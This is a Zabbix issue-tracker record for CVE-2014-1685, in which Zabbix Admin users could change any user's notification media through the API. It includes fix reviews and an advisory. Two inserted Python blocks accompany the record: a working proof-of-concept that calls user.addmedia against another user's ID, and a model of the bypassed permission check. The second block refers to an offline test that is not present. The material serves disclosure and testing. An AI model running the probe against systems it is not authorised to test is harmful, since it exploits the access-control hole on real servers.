ZABBIX BUGS AND ISSUES
ZBX-7693

User type "Zabbix Admin" users can modify the media for all Zabbix users - Security hole

    Details

      Description

      Based on the UI, I would assume (and hope) that only Zabbix Super Admins could modify the media for any user. In the UI, only Zabbix Super Admins can get to the Administration tab to make user changes. Using the API, I did a test today and found that a user of type "Zabbix Admin" can modify the media for any user in the Zabbix system! For history on why I found this, see ZBXNEXT-2122.

      CVE-2014-1685
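The description above says the hole is reachable only through the API, so the practical check is to log in as a "Zabbix Admin" user and ask the API to change another user's media. The script below is an added example written for this page, not Zabbix project code or the reporter's test. It talks to the 2.x JSON-RPC endpoint (api_jsonrpc.php, session token in the top-level "auth" member) and calls user.addmedia against a different userid; before the fix the call succeeds, after it the API returns a permission error. The frontend URL, credentials, target userid and the media type id "1" are assumptions you supply on the command line; the "sendto" value is constructed, and the media is created disabled with no severities so that a vulnerable server never actually notifies anyone. The transport is injectable so the decision logic can be exercised offline against canned responses.

```python
"""Probe for ZBX-7693 / CVE-2014-1685 against the Zabbix 2.x JSON-RPC API (added example)."""
import json
import sys
import urllib.request


class ZabbixError(Exception):
    """JSON-RPC error object returned by the API (code, message, data)."""

    def __init__(self, err):
        super().__init__(err.get("data") or err.get("message") or "unknown error")
        self.code = err.get("code")


class ZabbixRpc:
    def __init__(self, frontend_url, transport=None):
        # api_jsonrpc.php sits in the frontend root, e.g. http://host/zabbix/api_jsonrpc.php
        self.url = frontend_url.rstrip("/") + "/api_jsonrpc.php"
        self.auth = None
        self._id = 0
        self._transport = transport or self._http_post

    def _http_post(self, body):
        req = urllib.request.Request(
            self.url, data=body.encode(), headers={"Content-Type": "application/json-rpc"})
        with urllib.request.urlopen(req, timeout=30) as resp:
            return resp.read().decode()

    def call(self, method, params):
        """Send one JSON-RPC request; every call except user.login carries the session token."""
        self._id += 1
        msg = {"jsonrpc": "2.0", "method": method, "params": params, "id": self._id}
        if method != "user.login":
            msg["auth"] = self.auth
        reply = json.loads(self._transport(json.dumps(msg)))
        if "error" in reply:
            raise ZabbixError(reply["error"])
        return reply["result"]

    def login(self, user, password):
        self.auth = self.call("user.login", {"user": user, "password": password})
        return self.auth


def probe_media_authz(api, target_userid, mediatypeid="1"):
    """Try to attach a disabled, no-severity media entry to ANOTHER user's profile.

    Returns (vulnerable, mediaids, detail). vulnerable is True only when the server
    really created media on the target; remove it again with remove_probe_media().
    """
    media = {"mediatypeid": str(mediatypeid), "sendto": "zbx7693-probe@invalid",  # constructed
             "active": 1, "severity": 0, "period": "1-7,00:00-24:00"}  # active=1 means disabled
    try:
        result = api.call("user.addmedia",
                          {"users": [{"userid": str(target_userid)}], "medias": [media]})
    except ZabbixError as err:
        return False, [], "user.addmedia refused: %s" % err
    mediaids = list(result.get("mediaids", []))
    return bool(mediaids), mediaids, "user.addmedia created media %s on userid %s" % (
        mediaids, target_userid)


def remove_probe_media(api, mediaids):
    """Delete the media the probe created (user.deletemedia takes a list of mediaids)."""
    if not mediaids:
        return []
    return list(api.call("user.deletemedia", mediaids).get("mediaids", []))


def canned_transport(responses, log=None):
    """Offline stand-in for HTTP: maps method name -> {"result": ...} or {"error": ...}."""
    def transport(body):
        msg = json.loads(body)
        if log is not None:
            log.append(msg)
        reply = {"jsonrpc": "2.0", "id": msg["id"]}
        reply.update(responses[msg["method"]])
        return json.dumps(reply)
    return transport


if __name__ == "__main__":
    # usage: probe.py http://host/zabbix ADMIN_USER ADMIN_PASSWORD TARGET_USERID
    url, user, password, target = sys.argv[1:5]
    api = ZabbixRpc(url)
    api.login(user, password)
    vulnerable, ids, detail = probe_media_authz(api, target)
    print(("VULNERABLE: " if vulnerable else "not vulnerable: ") + detail)
    if ids:
        print("cleanup removed mediaids", remove_probe_media(api, ids))
```

Run it with an account of type "Zabbix Admin" (not Super Admin, who is legitimately allowed to edit anyone) and a throwaway target user; a server with the fix answers user.addmedia with a permission error such as the "You do not have permissions to create media for other users." text discussed later in this issue, while an unpatched server returns the new mediaids.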

        Activity

        Corey Shaw created issue -
        richlv made changes -
        Field Original Value New Value
        Labels security
        richlv made changes -
        Labels security -> security usermedia
        Priority Minor [ 4 ] Critical [ 2 ]
        Corey Shaw added a comment -

        ZBX-7693-modify-own-profile.patch fixes the hole by doing two things:

        1. Only Zabbix Super Admins can modify the media for any user.

        2. All other types of users can only modify their own media.

        Corey Shaw made changes -
        Attachment ZBX-7693-modify-own-profile.patch [ 26260 ]
        richlv made changes -
        Labels security usermedia -> patch security usermedia
        Eduards Samersovs (Inactive) made changes -
        Assignee Eduards Samersovs [ eduards ]
        Eduards Samersovs (Inactive) added a comment - - edited

        Big thanks for your patch!

        Fixed in development branch svn://svn.zabbix.com/branches/dev/ZBX-7693

        Eduards Samersovs (Inactive) made changes -
        Status Open [ 1 ] Resolved [ 5 ]
        Fix Version/s 2.2.2 [ 12012 ]
        Fix Version/s 2.3.0 (trunk) [ 12006 ]
        Resolution Fixed [ 1 ]
        Pavels Jelisejevs (Inactive) made changes -
        Assignee Eduards Samersovs [ eduards ] Pavels Jelisejevs [ jelisejev ]
        Pavels Jelisejevs (Inactive) added a comment - - edited

        (1) Zabbix admin users must be able to change media for themselves. You can use user.get with "editable" to check for both existence and permissions to the user.

        Eduards Samersovs RESOLVED r.41893

        Pavels Jelisejevs CLOSED.

        Pavels Jelisejevs (Inactive) made changes -
        Resolution Fixed [ 1 ]
        Status Resolved [ 5 ] Reopened [ 4 ]
        Pavels Jelisejevs (Inactive) made changes -
        Assignee Pavels Jelisejevs [ jelisejev ] Eduards Samersovs [ eduards ]
        Pavels Jelisejevs (Inactive) added a comment - - edited

        (2) Minor typo correction in r41856.

        Eduards Samersovs CLOSED

        Eduards Samersovs (Inactive) made changes -
        Status Reopened [ 4 ] Resolved [ 5 ]
        Assignee Eduards Samersovs [ eduards ] Pavels Jelisejevs [ jelisejev ]
        Resolution Fixed [ 1 ]
        Pavels Jelisejevs (Inactive) added a comment - - edited

        (3) I'm still able to add new media to other users using user.updatemedia.

        Eduards Samersovs RESOLVED r.41905

        Pavels Jelisejevs The user.updatemedia method must perform all of the permission validation and field validation itself. It should not delegate it to addmedia and deletemedia.

        Eduards Samersovs RESOLVED r.41966

        Pavels Jelisejevs Please refactor the validation code the way we discussed.

        Eduards Samersovs RESOLVED r.42017

        Pavels Jelisejevs I've made changes in r42221, please review.

        Eduards Samersovs OK, Thanks, please review r.42225

        Pavels Jelisejevs CLOSED.

        Pavels Jelisejevs (Inactive) added a comment - - edited

        (4) user.addmedia and user.deletemedia must be validated as well.

        Eduards Samersovs RESOLVED r.41905

        Pavels Jelisejevs

        Regarding user.addmedia:
        1. The CUser::validateAddMedia() must accept the same params as addMedia().
        2. The "foreach ($users as $user) {" loop is unnecessary in CUser::validateAddMedia().
        3. I suggest changing the error message to "You do not have permissions to create media for other users.". It's more correct.

        Regarding user.deletemedia:
        1. The error should be changed to the standard "No permissions to referred object or it does not exist!" message, since we're referencing media, not users in the request.

        Eduards Samersovs RESOLVED r.42017

        Pavels Jelisejevs I've made some changes to deletemedia in r42214, please review.

        Eduards Samersovs OK, please review r.42225

        Pavels Jelisejevs CLOSED.

        Pavels Jelisejevs (Inactive) made changes -
        Resolution Fixed [ 1 ]
        Status Resolved [ 5 ] Reopened [ 4 ]
        Assignee Pavels Jelisejevs [ jelisejev ] Eduards Samersovs [ eduards ]
        Eduards Samersovs (Inactive) made changes -
        Status Reopened [ 4 ] Resolved [ 5 ]
        Assignee Eduards Samersovs [ eduards ] Pavels Jelisejevs [ jelisejev ]
        Resolution Fixed [ 1 ]
        Pavels Jelisejevs (Inactive) added a comment - - edited

        (5) There is a problem with the user.get method that needs to be fixed before we can resolve this issue.

        {
            "editable": true,
            "countOutput": true,
            "userids": [
                "1"
            ]
        }
        

        The request above will always return "1" even if user "1" is not writable for the current user. Due to this bug we can still update media for other users as long as we specify only one user.

        Eduards Samersovs RESOLVED r.41973,41974

        Pavels Jelisejevs CLOSED.

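Comment (1) prescribes the check (ask user.get for the target users with "editable" and require that they all come back) and comment (5) shows how it can be defeated when the countOutput path skips the editable filter. The block below is an added example written for this page, not Zabbix code: the Directory class is a constructed stand-in for the users table, the user type constants follow Zabbix (1 user, 2 admin, 3 super admin), and user_get_count_bug models only the reported symptom (a single foreign userid counted as writable), not the actual PHP code path, which is not on this page.

```python
"""Model of the editable/countOutput authorization idiom behind ZBX-7693 (added example)."""
USER, ADMIN, SUPER_ADMIN = 1, 2, 3  # Zabbix user types


class Directory:
    """Constructed stand-in for the users table: userid -> user type."""

    def __init__(self, users):
        self.users = dict(users)

    def _existing(self, userids):
        return [uid for uid in userids if uid in self.users]

    def _writable_by(self, caller, userids):
        # Super Admins may edit anyone; every other type may edit only themselves.
        if self.users[caller] == SUPER_ADMIN:
            return list(userids)
        return [uid for uid in userids if uid == caller]

    def user_get(self, caller, userids, editable=False, count_output=False):
        """Model of user.get after the fix: the editable filter is applied before
        counting, so countOutput counts exactly the set the list form would return."""
        found = self._existing(userids)
        if editable:
            found = self._writable_by(caller, found)
        return len(found) if count_output else found

    def user_get_count_bug(self, caller, userids, editable=False, count_output=False):
        """Model of the defect in comment (5): with countOutput the editable filter was
        skipped, so {"editable": true, "countOutput": true, "userids": ["1"]} answered 1
        even when the caller could not write user 1."""
        found = self._existing(userids)
        if count_output:
            return len(found)  # existence only; permissions never consulted
        if editable:
            found = self._writable_by(caller, found)
        return found


def may_modify_media(directory, caller, target_userids, user_get=None):
    """The check comment (1) prescribes for user.updatemedia/addmedia: request the
    targets with editable=True and countOutput=True and require the count to equal the
    number of distinct targets. A missing or non-writable target makes the counts differ,
    so the caller learns nothing about which of the two it was."""
    user_get = user_get or directory.user_get
    targets = sorted(set(str(u) for u in target_userids))
    if not targets:
        return False
    return user_get(caller, targets, editable=True, count_output=True) == len(targets)
```

The idiom is only as strong as the guarantee that the count path and the list path apply the same permission filter; the bypass in comment (5) is exactly that guarantee failing, which is why the final assertion in the offline test below passes for the buggy user.get and fails for the fixed one.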
        Pavels Jelisejevs (Inactive) made changes -
        Resolution Fixed [ 1 ]
        Status Resolved [ 5 ] Reopened [ 4 ]
        Assignee Pavels Jelisejevs [ jelisejev ] Eduards Samersovs [ eduards ]
        richlv made changes -
        Fix Version/s 2.2.2rc1 [ 12011 ]
        Fix Version/s 2.2.2 [ 12012 ]
        richlv made changes -
        Description (text unchanged from the description above; the following line was appended)
        CVE-2014-1685
        Eduards Samersovs (Inactive) made changes -
        Status Reopened [ 4 ] Resolved [ 5 ]
        Assignee Eduards Samersovs [ eduards ] Pavels Jelisejevs [ jelisejev ]
        Resolution Fixed [ 1 ]
        Pavels Jelisejevs (Inactive) added a comment - - edited

        (6) Problems with usermedia.get:

        I'm logged in as an admin user. The following request should return all media for users in my user groups. Now it doesn't return anything.

        {
            "output": "extend"
        }
        

        Adding "editable" to the request must return only my media, but now it returns all of the media.

        Eduards Samersovs RESOLVED r.42017

        Pavels Jelisejevs CLOSED.

        Pavels Jelisejevs (Inactive) made changes -
        Resolution Fixed [ 1 ]
        Status Resolved [ 5 ] Reopened [ 4 ]
        Assignee Pavels Jelisejevs [ jelisejev ] Eduards Samersovs [ eduards ]
        Eduards Samersovs (Inactive) made changes -
        Status Reopened [ 4 ] Resolved [ 5 ]
        Assignee Eduards Samersovs [ eduards ] Pavels Jelisejevs [ jelisejev ]
        Resolution Fixed [ 1 ]
        Pavels Jelisejevs (Inactive) made changes -
        Assignee Pavels Jelisejevs [ jelisejev ] Eduards Samersovs [ eduards ]
        Eduards Samersovs (Inactive) made changes -
        Assignee Eduards Samersovs [ eduards ] Pavels Jelisejevs [ jelisejev ]
        Pavels Jelisejevs (Inactive) added a comment -

        TESTED.

        Pavels Jelisejevs (Inactive) made changes -
        Status Resolved [ 5 ] Tested [ 10002 ]
        Assignee Pavels Jelisejevs [ jelisejev ] Eduards Samersovs [ eduards ]
        Eduards Samersovs (Inactive) added a comment -

        Fixed in versions 2.3.0 (trunk) r.42234, 2.2.2rc1 r.42233

        Eduards Samersovs (Inactive) made changes -
        Status Tested [ 10002 ] Closed [ 6 ]
        Assignee Eduards Samersovs [ eduards ]
        richlv added a comment - - edited

        (7) this removed translatable string "Cannot insert user media." and added a translatable "DBerror". Two problems with that:

        a) it was done during string freeze;
        b) even if the string change is valid, "DBerror" should not be translatable

        Pavels Jelisejevs Fixed directly in 2.2 r42325 and 2.3 r42326.

        richlv made changes -
        Resolution Fixed [ 1 ]
        Status Closed [ 6 ] Reopened [ 4 ]
        richlv added a comment - - edited

        (8) this security problem has not been fixed for 1.8 and 2.0 - were they not vulnerable?

        Pavels Jelisejevs RESOLVED

        • for 2.0 in svn://svn.zabbix.com/branches/dev/ZBX-7693
        • for 1.8 in svn://svn.zabbix.com/branches/dev/ZBX-7693-1.8

        Eduards Samersovs CLOSED

        Pavels Jelisejevs (Inactive) made changes -
        Assignee Pavels Jelisejevs [ jelisejev ]
        Alexander Vladishev made changes -
        Assignee Pavels Jelisejevs [ jelisejev ] Alexander Vladishev [ sasha ]
        Alexander Vladishev made changes -
        Assignee Alexander Vladishev [ sasha ] Pavels Jelisejevs [ jelisejev ]
        Pavels Jelisejevs (Inactive) made changes -
        Status Reopened [ 4 ] Resolved [ 5 ]
        Assignee Pavels Jelisejevs [ jelisejev ] Eduards Samersovs [ eduards ]
        Resolution Fixed [ 1 ]
        Eduards Samersovs (Inactive) made changes -
        Status Resolved [ 5 ] Tested [ 10002 ]
        Assignee Eduards Samersovs [ eduards ] Pavels Jelisejevs [ jelisejev ]
        Pavels Jelisejevs (Inactive) added a comment -

        Fixed in 1.8.20rc2 r42354 and 2.0.11rc2 r42358.

        CLOSED.

        Pavels Jelisejevs (Inactive) made changes -
        Status Tested [ 10002 ] Closed [ 6 ]
        Fix Version/s 1.8.20rc2 [ 12105 ]
        Fix Version/s 2.0.11rc2 [ 12104 ]
        richlv added a comment - - edited

        -------------------------
        Vulnerability description
        -------------------------

        Users of type 'admin' may modify media for other users even though they should be able to modify their own media only.

        Please use CVE-2014-1685 to refer to this vulnerability.

        -------
        Details
        -------

        Users of type 'admin' should be able to modify only their own media. Zabbix API allowed them to modify media for any user.

        This issue has been reported by Corey Shaw.

        -----------------
        Affected versions
        -----------------

        All of the Zabbix versions are vulnerable to this problem.

        --------------
        Fixed versions
        --------------

        This vulnerability has been fixed in the latest releases of Zabbix.

        The fix is available in the following Zabbix releases:
        2.2.2
        2.0.11
        1.8.20

        Oleksiy Zagorskyi made changes -
        Labels patch security usermedia -> patch permissions security usermedia
        Alexey Pustovalov made changes -
        Link This issue is duplicated by SPT-8 [ SPT-8 ]
        Alexei Vladishev made changes -
        Workflow Zabbix workflow [ 33642 ] Zabbix workflow - new [ 47946 ]
        Alexander Vladishev made changes -
        Workflow Zabbix workflow - new [ 47946 ] Copy of Zabbix workflow - new [ 68211 ]
        Alexander Vladishev made changes -
        Workflow Copy of Zabbix workflow - new [ 68211 ] Zabbix workflow - new [ 83433 ]
        Gatis Rumbens made changes -
        Issue Type Bug [ 1 ] Incident report [ 10110 ]
        Zabbix ID NA
        Assignee Pavels Jelisejevs [ jelisejev ]
        Transition            Time In Source Status   Execution Times   Last Executer                   Last Execution Date
        Open -> Resolved      1d 8h 3m                1                 Eduards Samersovs (Inactive)    2014 Jan 24 09:52
        Resolved -> Reopened  1d 5h 35m               4                 Pavels Jelisejevs (Inactive)    2014 Jan 30 16:26
        Closed -> Reopened    1d 5h 26m               1                 richlv                          2014 Feb 05 22:07
        Reopened -> Resolved  6d 10h 41m              5                 Pavels Jelisejevs (Inactive)    2014 Feb 06 14:05
        Resolved -> Merging   4d 7h 15m               2                 Eduards Samersovs (Inactive)    2014 Feb 06 15:04
        Merging -> Closed     1h 18m                  2                 Pavels Jelisejevs (Inactive)    2014 Feb 06 16:10

          People

          • Assignee: Unassigned
          • Reporter: Corey Shaw
          • Votes: 0
          • Watchers: 0